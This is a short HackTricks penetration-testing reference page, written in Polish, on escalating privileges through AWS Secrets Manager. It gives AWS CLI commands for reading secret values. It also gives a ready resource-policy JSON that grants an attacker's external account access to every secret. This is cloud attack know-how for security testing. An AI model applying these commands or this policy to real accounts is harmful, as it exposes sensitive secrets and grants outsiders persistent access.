AWS - Secrets Manager Privesc

Support HackTricks

Secrets Manager

Aby uzyskać więcej informacji na temat menedżera sekretów, sprawdź:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Atakujący z tym uprawnieniem może uzyskać zapisana wartość wewnątrz sekretu w AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencjalny wpływ: Uzyskanie dostępu do danych o wysokiej wrażliwości w usłudze AWS Secrets Manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Dzięki wcześniejszym uprawnieniom możliwe jest przyznanie dostępu innym podmiotom/kontom (nawet zewnętrznym) do uzyskania dostępu do sekretu. Należy pamiętać, że aby odczytać sekrety zaszyfrowane kluczem KMS, użytkownik musi również mieć dostęp do klucza KMS (więcej informacji na stronie KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
Wsparcie HackTricks

Last updated